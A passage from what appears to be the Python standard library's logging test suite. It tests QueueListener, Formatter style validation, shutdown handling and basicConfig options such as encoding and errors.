self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
